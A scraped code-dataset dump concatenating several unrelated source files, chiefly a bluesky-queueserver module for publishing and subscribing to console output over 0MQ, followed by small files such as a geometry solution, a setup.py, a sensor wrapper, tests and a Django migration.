Enable/disable publishing console output to 0MQ socket
zmq_publish_addr : str, None
Address of 0MQ PUB socket for the publishing server. If ``None``, then
the default address ``tcp://*:60625`` is used.
zmq_topic : str
Name of the 0MQ topic where the messages are published.
name : str
Name of the thread where the messages are published.
"""
def __init__(
self,
*,
msg_queue,
console_output_on=True,
zmq_publish_on=True,
zmq_publish_addr=None,
zmq_topic=_default_zmq_console_topic,
name="RE Console Output Publisher",
):
        self._thread_running = False  # True while the publishing thread should keep running
self._thread_name = name
self._msg_queue = msg_queue
self._polling_timeout = 0.1 # in sec.
self._console_output_on = console_output_on
self._zmq_publish_on = zmq_publish_on
zmq_publish_addr = zmq_publish_addr or default_zmq_info_address_for_server
self._zmq_publish_addr = zmq_publish_addr
self._zmq_topic = zmq_topic
self._socket = None
if self._zmq_publish_on:
try:
context = zmq.Context()
self._socket = context.socket(zmq.PUB)
self._socket.bind(self._zmq_publish_addr)
except Exception as ex:
logger.error(
"Failed to create 0MQ socket at %s. Console output will not be published. Exception: %s",
self._zmq_publish_addr,
ex,
)
if self._socket and self._zmq_publish_on:
            logger.info("Publishing console output to 0MQ socket at %s", zmq_publish_addr)
def start(self):
"""
Start thread polling the queue.
"""
self._start_processing_thread()
def stop(self):
"""
        Stop the thread that polls the queue (and exit the thread).
"""
self._thread_running = False
def __del__(self):
self.stop()
if self._socket:
self._socket.close()
def _start_processing_thread(self):
        # The thread should not be started if the Message Queue object does not exist
if not self._thread_running and self._msg_queue:
self._thread_running = True
self._thread_conn = threading.Thread(
target=self._publishing_thread, name=self._thread_name, daemon=True
)
self._thread_conn.start()
def _publishing_thread(self):
while True:
try:
msg = self._msg_queue.get(block=True, timeout=self._polling_timeout)
self._publish(msg)
except Exception:
pass
if not self._thread_running: # Exit thread
break
def _publish(self, payload):
if self._console_output_on:
sys.__stdout__.write(payload["msg"])
sys.__stdout__.flush()
if self._zmq_publish_on and self._socket:
topic = self._zmq_topic
payload_json = json.dumps(payload)
self._socket.send_multipart([topic.encode("ascii"), payload_json.encode("utf8")])
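# Publisher usage sketch (the queue is typically filled from worker processes
# via ConsoleOutputStream):
#
#     publisher = PublishConsoleOutput(msg_queue=msg_queue)
#     publisher.start()   # messages put on msg_queue are printed and published
#     ...
#     publisher.stop()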
class ReceiveConsoleOutput:
"""
    The class allows subscribing to published 0MQ messages and reading the messages one by
one as they arrive. Subscription is performed using the remote 0MQ address and topic.
The class provides blocking (with timeout) ``recv()`` method that waits for the next
published message. The following example contains the code illustrating using the class.
In real-world application the loop will be running in a separate thread and generating
callbacks on each received message.
    The ``subscribe()`` and ``unsubscribe()`` methods allow explicitly subscribing and
    unsubscribing the socket to the topic. The messages published while the socket is unsubscribed
are discarded. First call to ``recv()`` method automatically subscribes the socket.
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutput
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutput(zmq_subscribe_addr=zmq_subscribe_addr)
while True:
try:
payload = rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# Insert the code that needs to be executed on timeout (if any).
pass
# Place for the code that should be executed after receiving each
# message or after timeout (e.g. check a condition and exit
# the loop once the condition is satisfied).
Parameters
----------
zmq_subscribe_addr : str or None
        Address of ZMQ server (PUB socket). If None, then the default address
        ``tcp://localhost:60625`` is used.
zmq_topic : str
0MQ topic for console output. Only messages from this topic are going to be received.
timeout : int, float or None
Timeout for the receive operation in milliseconds. If `None`, then wait
for the message indefinitely.
"""
def __init__(self, *, zmq_subscribe_addr=None, zmq_topic=_default_zmq_console_topic, timeout=1000):
self._timeout = timeout # Timeout for 'recv' operation (ms)
zmq_subscribe_addr = zmq_subscribe_addr or default_zmq_info_address
logger.info("Subscribing to console output stream from 0MQ address: %s ...", zmq_subscribe_addr)
logger.info("Subscribing to 0MQ topic: '%s' ...", zmq_topic)
self._zmq_subscribe_addr = zmq_subscribe_addr
self._zmq_topic = zmq_topic
self._socket = None
self._socket_subscribed = False
if self._zmq_subscribe_addr:
context = zmq.Context()
self._socket = context.socket(zmq.SUB)
self._socket.connect(self._zmq_subscribe_addr)
def subscribe(self):
"""
Subscribe 0MQ socket to the console output topic. Once the socket is subscribed,
        the published messages are cached by 0MQ and can be loaded with the ``recv()`` method.
The function does nothing if the socket is already subscribed.
"""
if self._socket and not self._socket_subscribed:
self._socket.subscribe(self._zmq_topic)
self._socket_subscribed = True
def unsubscribe(self):
"""
Unsubscribe 0MQ socket from the console output topic. Once the socket is unsubscribed,
all published messages are discarded.
"""
if self._socket and self._socket_subscribed:
self._socket.unsubscribe(self._zmq_topic)
self._socket_subscribed = False
def recv(self, timeout=-1):
"""
Get the next published message. The function subscribes the socket to 0MQ topic
if the socket is not already subscribed. If timeout expires then ``TimeoutError``
is raised.
Parameters
----------
timeout : int, float or None
Timeout for the receive operation in milliseconds. If timeout is
a negative number (default), the timeout value passed to the class
constructor is used. If `None`, then wait indefinitely.
Returns
-------
dict
Received message. The dictionary contains timestamp (``time`` key)
and text message (``msg`` key).
Raises
------
TimeoutError
Timeout occurred. Timeout does not indicate communication error.
"""
if (timeout is not None) and (timeout < 0):
timeout = self._timeout
# Subscribe the socket to the topic if it is not already subscribed
self.subscribe()
if not self._socket.poll(timeout=timeout):
            raise TimeoutError(f"No message received during timeout period {timeout} ms")
topic, payload_json = self._socket.recv_multipart()
payload_json = payload_json.decode("utf8", "strict")
payload = json.loads(payload_json)
return payload
    def __del__(self):
        if self._socket:
            self._socket.close()
class ReceiveConsoleOutputAsync:
"""
Async version of ``ReceiveConsoleOutput`` class. There are two ways to use the class:
explicitly awaiting for the ``recv`` function (same as in ``ReceiveConsoleOutput``)
or setting up a callback function (plain function or coroutine).
    The ``subscribe()`` and ``unsubscribe()`` methods allow explicitly subscribing and
    unsubscribing the socket to the topic. The messages published while the socket is unsubscribed
are discarded. Calls to ``recv()`` and ``start()`` methods always subscribe the socket,
``stop()`` method unsubscribes the socket unless called with ``unsubscribe=False``.
Explicitly awaiting ``recv`` function:
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutputAsync
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutputAsync(zmq_subscribe_addr=zmq_subscribe_addr)
async def run_acquisition():
while True:
try:
payload = await rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# Insert the code that needs to be executed on timeout (if any).
pass
# Place for the code that should be executed after receiving each
# message or after timeout (e.g. check a condition and exit
# the loop once the condition is satisfied).
# Subscribe to start caching messages. Calling 'recv()' also subscribes the socket.
rco.subscribe()
asyncio.run(run_acquisition())
# Unsubscribe to discard all new messages
rco.unsubscribe()
Setting up callback function or coroutine (awaitable function):
.. code-block:: python
from bluesky_queueserver import ReceiveConsoleOutputAsync
zmq_subscribe_addr = "tcp://localhost:60625"
rco = ReceiveConsoleOutputAsync(zmq_subscribe_addr=zmq_subscribe_addr)
async def cb_coro(payload):
time, msg = payload.get("time", None), payload.get("msg", None)
# In this example the messages are printed in the terminal.
sys.stdout.write(msg)
sys.stdout.flush()
rco.set_callback(cb_coro)
async def run_acquisition():
rco.start()
# Do something useful here, e.g. sleep
asyncio.sleep(60)
rco.stop()
# Acquisition can be started and stopped multiple time if necessary
rco.start()
asyncio.sleep(60)
rco.stop()
asyncio.run(run_acquisition())
.. note::
If callback is a plain function, it is executed immediately after the message is received
and may potentially block the loop if it takes too long to complete (even occasionally).
If the callback is a coroutine, it is not awaited, but instead placed in the loop
(with ``ensure_future``), so acquisition of messages will continue. Typically the callback
will do a simple operation such as adding the received message to the queue.
Parameters
----------
zmq_subscribe_addr : str or None
        Address of ZMQ server (PUB socket). If None, then the default address
        ``tcp://localhost:60625`` is used.
zmq_topic : str
0MQ topic for console output. Only messages from this topic are going to be received.
timeout : int, float or None
Timeout for the receive operation in milliseconds. If `None`, then wait
for the message indefinitely.
"""
def __init__(self, *, zmq_subscribe_addr=None, zmq_topic=_default_zmq_console_topic, timeout=1000):
self._timeout = timeout # Timeout for 'recv' operation (ms)
zmq_subscribe_addr = zmq_subscribe_addr or "tcp://localhost:60625"
self._callback = None # Function that is awaited once a message is received from RE Manager
self._exit = False
self._is_running = False
logger.info("Subscribing to console output stream from 0MQ address: %s ...", zmq_subscribe_addr)
logger.info("Subscribing to 0MQ topic: '%s' ...", zmq_topic)
self._zmq_subscribe_addr = zmq_subscribe_addr
self._zmq_topic = zmq_topic
self._socket = None
self._socket_subscribed = False
self._unsubscribe_when_stopping = False
if self._zmq_subscribe_addr:
context = zmq.asyncio.Context()
self._socket = context.socket(zmq.SUB)
self._socket.connect(self._zmq_subscribe_addr)
def subscribe(self):
"""
Subscribe 0MQ socket to the console output topic. Once the socket is subscribed,
        the published messages are cached by 0MQ and can be loaded with the ``recv()`` method.
The function does nothing if the socket is already subscribed.
"""
if self._socket and not self._socket_subscribed:
self._socket.subscribe(self._zmq_topic)
self._socket_subscribed = True
def unsubscribe(self):
"""
Unsubscribe 0MQ socket from the console output topic. Once the socket is unsubscribed,
all published messages are discarded.
"""
if self._socket and self._socket_subscribed:
self._socket.unsubscribe(self._zmq_topic)
self._socket_subscribed = False
def set_callback(self, cb):
"""
Set callback function, which is called once for each received message. If ``cb`` is
a function, it is called immediately and execution of the loop is blocked until the
execution of the function is complete. If ``cb`` is coroutine, it is not awaited, but
instead placed in the loop using ``asyncio.ensure_future``. Only one callback function
can be set.
Parameters
----------
cb : callable, coroutine or None
Reference to a callback function or coroutine. The function signature is expected
to receive a message as a parameter (message is a dictionary with keys ``time`` and ``msg``)
and return ``None``. The function is expected to handle exceptions that are raised
internally. Pass ``None`` to clear callback (messages will be received and discarded).
"""
self._callback = cb
async def recv(self, timeout=-1):
"""
        Get the next published message. If timeout expires then ``TimeoutError`` is raised.
        If the socket is not subscribed to the topic, then the socket is subscribed first.
Parameters
----------
timeout : int, float or None
Timeout for the receive operation in milliseconds. If timeout is
a negative number (default), the timeout value passed to the class
constructor is used. If `None`, then wait indefinitely.
Returns
-------
dict
Received message. The dictionary contains timestamp (``time`` key)
and text message (``msg`` key).
Raises
------
TimeoutError
Timeout occurred. Timeout does not indicate communication error.
"""
if (timeout is not None) and (timeout < 0):
timeout = self._timeout
# Subscribe the socket to the topic if it is not already subscribed
self.subscribe()
if not await self._socket.poll(timeout=timeout):
            raise TimeoutError(f"No message received during timeout period {timeout} ms")
topic, payload_json = await self._socket.recv_multipart()
payload_json = payload_json.decode("utf8", "strict")
payload = json.loads(payload_json)
return payload
async def _recv_next_message(self):
try:
payload = await self.recv()
if self._callback:
if inspect.iscoroutinefunction(self._callback):
asyncio.ensure_future(self._callback(payload))
else:
self._callback(payload)
except TimeoutError:
pass
except Exception as ex:
logger.exception(
"Exception occurred while while waiting for RE Manager console output message: %s", ex
)
if not self._exit:
asyncio.ensure_future(self._recv_next_message())
else:
if self._unsubscribe_when_stopping:
self.unsubscribe()
self._is_running = False
def start(self):
"""
Start collection of messages published by RE Manager. Collection may be started and stopped
multiple times during a session. Repeated calls to the ``start`` method are ignored.
The function MUST be called from the event loop. The method always subscribes the socket.
"""
self._exit = False
if not self._is_running:
self._is_running = True
self.subscribe()
asyncio.ensure_future(self._recv_next_message())
def stop(self, *, unsubscribe=True):
"""
        Stop collection of messages published by RE Manager. A call to the ``stop`` method unsubscribes
        the client from the 0MQ topic, therefore all the messages published until collection is started
        again are ignored. The function MUST be called from the event loop.
Parameters
----------
unsubscribe: boolean (optional)
Unsubscribe the socket if ``True`` (default), otherwise leave the socket subscribed.
"""
self._unsubscribe_when_stopping = unsubscribe
self._exit = True
def __del__(self):
self.stop()
if self._socket:
self._socket.close()
def qserver_console_monitor_cli():
"""
CLI tool for remote monitoring of console output from RE Manager. The function is also
expected to be used as an example of using ``ReceiveConsoleOutput`` class.
"""
logging.basicConfig(level=logging.WARNING)
logging.getLogger("bluesky_queueserver").setLevel("INFO")
def formatter(prog):
# Set maximum width such that printed help mostly fits in the RTD theme code block (documentation).
return argparse.RawDescriptionHelpFormatter(prog, max_help_position=20, width=90)
parser = argparse.ArgumentParser(
description="Queue Server Console Monitor:\nCLI tool for remote monitoring of console output "
f"published by RE Manager.\nbluesky-queueserver version {qserver_version}\n",
formatter_class=formatter,
)
parser.add_argument(
"--zmq-info-addr",
dest="zmq_info_addr",
type=str,
default=None,
help="The address of RE Manager socket used for publishing console output. The parameter overrides "
"the address set using QSERVER_ZMQ_INFO_ADDRESS environment variable. The default value is used "
"if the address is not set using the parameter or the environment variable. Address format: "
f"'tcp://127.0.0.1:60625' (default: {default_zmq_info_address}).",
)
parser.add_argument(
"--zmq-subscribe-addr",
dest="zmq_subscribe_addr",
type=str,
default=None,
help="The parameter is deprecated and will be removed. Use --zmq-info-addr instead.",
)
args = parser.parse_args()
zmq_info_addr = args.zmq_info_addr
if args.zmq_subscribe_addr is not None:
logger.warning(
"The parameter --zmq-subscribe-addr is deprecated and will be removed. Use --zmq-info-addr instead."
)
zmq_info_addr = zmq_info_addr or args.zmq_subscribe_addr
zmq_info_addr = zmq_info_addr or os.environ.get("QSERVER_ZMQ_INFO_ADDRESS", None)
zmq_info_addr = zmq_info_addr or default_zmq_info_address
try:
rco = ReceiveConsoleOutput(zmq_subscribe_addr=zmq_info_addr)
rco.subscribe()
while True:
try:
payload = rco.recv()
time, msg = payload.get("time", None), payload.get("msg", None) # noqa: F841
sys.stdout.write(msg)
sys.stdout.flush()
except TimeoutError:
# Timeout does not mean communication error!!!
# There is no need to use or process timeouts. This code
# serves mostly as an example of how to use it.
pass
# Place for the code that should be executed after receiving each
# message or after timeout. (E.g. the code may check some condition
# and exit the loop once the condition is fulfilled.)
        exit_code = 0  # The code is set if the loop is exited (which does not happen here)
except BaseException as ex:
logger.exception("Queue Server Console Monitor failed with exception: %s", str(ex))
exit_code = 1
return exit_code
| [
"[email protected]"
] | |
2c161ca9efa8d4b256b9cbf48c804dc8659b5b10 | 1086ef8bcd54d4417175a4a77e5d63b53a47c8cf | /Forks/uvapy-master/geometry/p10005.py | 22919427968cb78efca83f85a7629ab024461bf1 | [
"MIT"
] | permissive | wisdomtohe/CompetitiveProgramming | b883da6380f56af0c2625318deed3529cb0838f6 | a20bfea8a2fd539382a100d843fb91126ab5ad34 | refs/heads/master | 2022-12-18T17:33:48.399350 | 2020-09-25T02:24:41 | 2020-09-25T02:24:41 | 298,446,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,600 | py | from math import isclose
class Circle:
def __init__(self, **kwargs):
if "p1" in kwargs and "p2" in kwargs and "p3" in kwargs:
self.from_three_points(kwargs["p1"], kwargs["p2"], kwargs["p3"])
# elif "c" in kwargs and "r" in kwargs:
# self.from_center_radius(kwargs["c"], kwargs["r"])
else:
raise ValueError("Unknown constructor called: {}".format(kwargs.keys()))
def from_three_points(self, p1, p2, p3):
if isclose(p1.x, p2.x):
            p3, p1 = p1, p3
mr = (p2.y-p1.y) / (p2.x-p1.x)
if isclose(p2.x, p3.x):
            p1, p2 = p2, p1
mt = (p3.y-p2.y) / (p3.x-p2.x)
if isclose(mr, mt):
raise ValueError("No such circle exists.")
x = (mr*mt*(p3.y-p1.y) + mr*(p2.x+p3.x) - mt*(p1.x+p2.x)) / (2*(mr-mt))
y = (p1.y+p2.y)/2 - (x - (p1.x+p2.x)/2) / mr
radius = pow((pow((p2.x-x), 2) + pow((p2.y-y), 2)), 0.5)
self.c = (x, y)
self.r = radius
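    # Sanity-check sketch (using the Point type defined above):
    # Circle(p1=Point(0, 0), p2=Point(1, 1), p3=Point(2, 0)) gives
    # self.c == (1.0, 0.0) and self.r == 1.0.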
while True:
n = int(input())
if n == 0:
break
points = []
for i in range(n):
        p = Point(*map(int, input().split()))
        points.append(p)
r = float(input())
if n == 1:
# Always feasible to embed a point in a circle (r == 0?)
print("The polygon can be packed in the circle.")
elif n == 2:
dist_l2 = (points[1][0] - points[0][0]) ** 2 + (points[1][1] - points[0][1])**2
if dist_l2 <= (r+r)**2:
print("The polygon can be packed in the circle.")
else:
print("There is no way of packing that polygon.")
else:
# Find a circle that passes through first three points
c = Circle(p1 = points[0], p2 = points[1], p3 = points[2]) | [
"[email protected]"
] | |
1336aaa3cf00acaea477d1715361e818158c5ce9 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /TAhuay457cw5AekBe_5.py | 91d14e284af645ac11d85fa441299abdbfccac66 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py |
from re import sub
vowels = {"a", "e", "i", "o", "u", "A", "E", "I", "O", "U"}
def monkey_talk(txt):
return "{}.".format(sub(r"^[eo]", lambda m: m.group().upper(),
sub(r"[A-Za-z]+",
lambda m: "eek" if m.group()[0] in vowels
else "ook", txt)))
| [
"[email protected]"
] | |
1cedde77ae394ba32a9d083fb8ec824a480ef2c5 | 6974096eaf642a1c3dfbc4567d0f0776621261de | /setup.py | 2eea792aa201ef462b7a712aa3ca336ef13a4f22 | [
"Apache-2.0"
] | permissive | thrrgilag/pantalaimon | 29709e1231db7655e57685babad27094f68afe5c | d388a21b9b1f17b7f52790f79dd571d8e75a4543 | refs/heads/master | 2022-11-13T12:56:14.747072 | 2020-07-02T10:19:59 | 2020-07-02T10:19:59 | 277,380,106 | 0 | 0 | Apache-2.0 | 2020-07-05T20:41:57 | 2020-07-05T20:41:56 | null | UTF-8 | Python | false | false | 1,345 | py | # -*- coding: utf-8 -*-
from setuptools import find_packages, setup
with open("README.md", encoding="utf-8") as f:
long_description = f.read()
setup(
name="pantalaimon",
version="0.6.5",
url="https://github.com/matrix-org/pantalaimon",
author="The Matrix.org Team",
author_email="[email protected]",
description=("A Matrix proxy daemon that adds E2E encryption "
"capabilities."),
long_description=long_description,
long_description_content_type="text/markdown",
license="Apache License, Version 2.0",
packages=find_packages(),
install_requires=[
"attrs >= 19.3.0",
"aiohttp >= 3.6, < 4.0",
"appdirs >= 1.4.4",
"click >= 7.1.2",
"keyring >= 21.2.1",
"logbook >= 1.5.3",
"peewee >= 3.13.1",
"janus >= 0.5",
"cachetools >= 3.0.0"
"prompt_toolkit>2<4",
"typing;python_version<'3.5'",
"matrix-nio[e2e] >= 0.14, < 0.15"
],
extras_require={
"ui": [
"dbus-python <= 1.2",
"PyGObject <= 3.36",
"pydbus <= 0.6",
"notify2 <= 0.3",
]
},
entry_points={
"console_scripts": ["pantalaimon=pantalaimon.main:main",
"panctl=pantalaimon.panctl:main"],
},
zip_safe=False
)
| [
"[email protected]"
] | |
0a435d06d21f40db400cf199480df79d7c0e0d0f | dcc491dd2fa4ece68728255d236fa6e784eef92d | /modules/2.78/bpy/types/PythonController.py | a6975a4e8c4fe364b1b578e3084575a187be1d7d | [
"MIT"
] | permissive | cmbasnett/fake-bpy-module | a8e87d5a95d075e51133307dfb55418b94342f4f | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | refs/heads/master | 2020-03-14T16:06:29.132956 | 2018-05-13T01:29:55 | 2018-05-13T01:29:55 | 131,691,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | class PythonController:
mode = None
module = None
text = None
use_debug = None
| [
"[email protected]"
] | |
5699dafae03660ced229e5fb381de892c3f83a6d | c4f7b067dbf9efa404d446453cdf2b0839d33fe1 | /src/sensorrunner/devices/SPI/ADC/device.py | 48e20b4d57883c0fadef06f30a025389e38cda66 | [] | no_license | JackBurdick/sensorrunner | 90e05e35381363ad28301b0e28579372fd78c179 | 506772d2ec4887b3890e4555b66bf5548910d020 | refs/heads/master | 2023-07-02T18:26:21.418501 | 2021-02-22T02:27:04 | 2021-02-22T02:27:04 | 298,879,591 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,386 | py | from sensorrunner.devices.sensor.SPI.ADC.light.pt19 import PT19
from gpiozero import MCP3008, Device
# from gpiozero.pins.mock import MockFactory
from gpiozero.pins.native import NativeFactory
Device.pin_factory = NativeFactory()
class MDC3800:
def __init__(
self,
name,
# devices
devices_dict,
):
# NOTE: accepting tuples currently because I'm not sure what the config
# will look like yet
# "fn": None --> resort to default fn
self.ALLOWED_DEVICES = {"pt19": {"device_class": PT19, "fn": None}}
# connected = (name, address, channel, device, fn)
if devices_dict is None:
raise ValueError("no devices specified in `device_dict`")
# TODO: assure pins are valid/acceptable
# light = MCP3008(channel=0, clock_pin=11, mosi_pin=10, miso_pin=9,
# select_pin=8)
# TODO: ensure channel 0-8
channel_to_device = {}
devices = {}
for name, dd in devices_dict.items():
devices[name] = {}
cur_dev_class = self.ALLOWED_DEVICES[dd["device_type"]]["device_class"]
if dd["channel"] not in channel_to_device:
channel_to_device[dd["channel"]] = MCP3008(
channel=dd["channel"],
clock_pin=11,
mosi_pin=10,
miso_pin=9,
select_pin=8,
)
cur_device = channel_to_device[dd["channel"]]
cur_device_obj = cur_dev_class(cur_device)
# TODO: this really isn't a device_type but a device_object - same
# in I2C
devices[name]["device_type"] = cur_device_obj
            # Collect public callables from the wrapped device object; 'fn_name'
            # is later resolved against this same object.
            available_fns = [
                f
                for f in dir(cur_device_obj)
                if callable(getattr(cur_device_obj, f)) and not f.startswith("_")
            ]
try:
dev_fn = dd["fn_name"]
except KeyError:
dev_fn = None
if dev_fn is not None:
if dev_fn not in available_fns:
raise ValueError(
f"specified fn ({dev_fn}) for {name} not available for {cur_device}.\n"
f"please select from {available_fns}"
)
fn_name = dev_fn
else:
fn_name = "return_value"
try:
devices[name]["fn"] = getattr(devices[name]["device_type"], fn_name)
            except AttributeError:
                raise ValueError(
                    f"specified fn ({fn_name}) for {name} not available for {cur_device_obj}.\n"
f"please select from {available_fns}"
)
self.devices = devices
def return_value(self, name, params):
if name is None:
return ValueError(
f"no name specified. please select from {self.devices.keys()}"
)
if not isinstance(name, str):
return ValueError(f"`name` is expected to be type {str}, not {type(name)}")
try:
dev_d = self.devices[name]
except KeyError:
raise ValueError(
f"{name} is not available. please select from {self.devices.keys()}"
)
if params:
value = dev_d["fn"](**params)
else:
# TODO: try
value = dev_d["fn"]()
return value
@staticmethod
def build_task_params(device_name, device_dict):
"""
dist0 = Entry(
"run_dist_0",
"tasks.iic.tasks.dist_select",
schedule=celery.schedules.schedule(run_every=2),
kwargs={},
app=celery_app.app,
)
# name=None, task=None, schedule=None, kwargs, app
{
"env_a": {
"channel": 2,
"address": 114,
"device_type": "si7021",
"params": {"run": {"unit": "f"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
"dist_a": {
"channel": 0,
"address": 112,
"device_type": "vl53l0x",
"params": {"run": {"unit": "in"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
}
"""
DEFAULT_FN_NAME = "return_value"
entry_specs = {}
for comp_name, comp_dict in device_dict.items():
dev_dict = comp_dict.copy()
entry_d = {}
fn_name = comp_dict["fn_name"]
if fn_name is None:
fn_name = DEFAULT_FN_NAME
entry_d["name"] = f"{device_name}_{comp_name}_{fn_name}"
# TODO: make more robust
entry_d["task"] = "sensorrunner.tasks.devices.MDC3800.tasks.MDC3800_run"
# maybe make schedule outside this?
entry_d["run_every"] = comp_dict["params"]["schedule"]["frequency"]
if not isinstance(dev_dict, dict):
raise ValueError(
f"run params ({dev_dict}) expected to be type {dict}, not {type(dev_dict)}"
)
# add component name
dev_dict["name"] = comp_name
entry_d["kwargs"] = {"dev_dict": dev_dict}
entry_specs[comp_name] = entry_d
return entry_specs
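    # Usage sketch (hypothetical component names; 'pt19' is the only entry in
    # ALLOWED_DEVICES above):
    #
    #     device_dict = {
    #         "light_a": {
    #             "channel": 0,
    #             "device_type": "pt19",
    #             "fn_name": None,
    #             "params": {"schedule": {"frequency": 60.0}},
    #         }
    #     }
    #     board = MDC3800("adc0", device_dict)
    #     entries = MDC3800.build_task_params("adc0", device_dict)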
| [
"[email protected]"
] | |
eb1babf920093b006230d7ec6c101e59b897093d | cf91f1a6354ba7a803af8382e0ef8bde6175845e | /tests/test_with.py | 1fd2a1f616ddef483c4ca7b17a027e7e1cd824b0 | [] | permissive | mueslo/python-progressbar | a230dc1be0af48015215d10a6b21e1d15005ccb4 | 5621a26b51cddc3ce3f2b62a9e32a28eb60a2f84 | refs/heads/master | 2022-11-10T18:23:08.242413 | 2020-06-25T19:36:56 | 2020-06-25T19:36:56 | 275,635,088 | 0 | 0 | BSD-3-Clause | 2020-06-28T17:29:57 | 2020-06-28T17:29:56 | null | UTF-8 | Python | false | false | 429 | py | import progressbar
def test_with():
with progressbar.ProgressBar(max_value=10) as p:
for i in range(10):
p.update(i)
def test_with_stdout_redirection():
with progressbar.ProgressBar(max_value=10, redirect_stdout=True) as p:
for i in range(10):
p.update(i)
def test_with_extra_start():
with progressbar.ProgressBar(max_value=10) as p:
p.start()
p.start()
| [
"[email protected]"
] | |
01fd76371431a37e8804b4f2de5e71eb488b3154 | 0e9f73d2ef1239b22e049ef6338362da7dbfb122 | /source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0097_auto_20190514_2147.py | 5d4d4dab7faf5ac58c7e11ed8ee2ae65fe9af49c | [] | no_license | Andy-Mason/FatQuants | 3c4bfafc29834af76b0be40e93b0e210e0ef5056 | edd0e98f4599ef91adbdf4179164769ddd66c62a | refs/heads/master | 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 745 | py | # Generated by Django 2.1.7 on 2019-05-14 20:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0096_auto_20190514_2147'),
]
operations = [
migrations.AddField(
model_name='ticker',
name='product_leverage',
field=models.FloatField(blank=True, db_column='product_leverage', null=True, verbose_name='Product Leverage'),
),
migrations.AddField(
model_name='ticker',
name='unit_type',
field=models.CharField(blank=True, choices=[('Acc', 'Accumulation'), ('Inc', 'Income')], db_column='unit_type', default='', max_length=3, verbose_name='Unit Type'),
),
]
| [
"[email protected]"
] | |
385053382cb462ca295e3ea3ca1df86b6ad1b044 | 99b2aff89dcec2f43cee32a6bdd4c0c43d6c51fa | /tests/contract_tests/growl_tdg_garden/test_growl_tdg_garden_pick_intial_id.py | 1782590265f597e5d879efb03aac96504f4f4d5d | [
"MIT"
] | permissive | baking-bad/pytezos | c4248bde49a5b05521b8cc51eeca588b1a721660 | 19747e3acec2141f06e812025673f497fc07e2d4 | refs/heads/master | 2023-07-06T21:57:09.572985 | 2023-07-05T11:45:27 | 2023-07-05T11:45:27 | 169,243,460 | 115 | 43 | MIT | 2023-07-04T16:28:09 | 2019-02-05T13:12:50 | Python | UTF-8 | Python | false | false | 1,885 | py | import json
from os.path import dirname
from os.path import join
from unittest import TestCase
from pytezos.michelson.forge import forge_micheline
from pytezos.michelson.forge import unforge_micheline
from pytezos.michelson.program import MichelsonProgram
folder = 'typed_minter'
entrypoint = 'mint_TYPED'
class MainnetOperationTestCaseGROWL_TDG_GARDEN(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'pick_intial_id.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'pick_intial_id'
cls.operation = operation
# cls.maxDiff = None
def test_parameters_growl_tdg_garden(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
# pprint(py_obj)
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_growl_tdg_garden(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_storage_diff = self.operation['lazy_storage_diff']
extended_storage = storage.merge_lazy_diff(lazy_storage_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
# pprint(py_obj)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
| [
"[email protected]"
] | |
8c2b88a90276e8878d80b2051ba69a0ae3c43a9d | 9f491494ad39b91c906517ceb3008c752c214989 | /NRE_paper_study/ERNIE/ERNIE/code/run_fewrel.py | 6cd39d87b03a062812499b41ae86f44523c8c782 | [
"MIT"
] | permissive | yuwell1999/nlp_paper_study | 0b73b2e8235a4dffc0fa5016c23d7998a15f58a7 | b7772aa9c15d3b8459d9b8c3addb93c575a93ef2 | refs/heads/master | 2022-04-15T22:01:45.526579 | 2020-04-07T14:24:27 | 2020-04-07T14:24:27 | 256,650,641 | 1 | 0 | null | 2020-04-18T02:07:02 | 2020-04-18T02:07:02 | null | UTF-8 | Python | false | false | 23,722 | py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
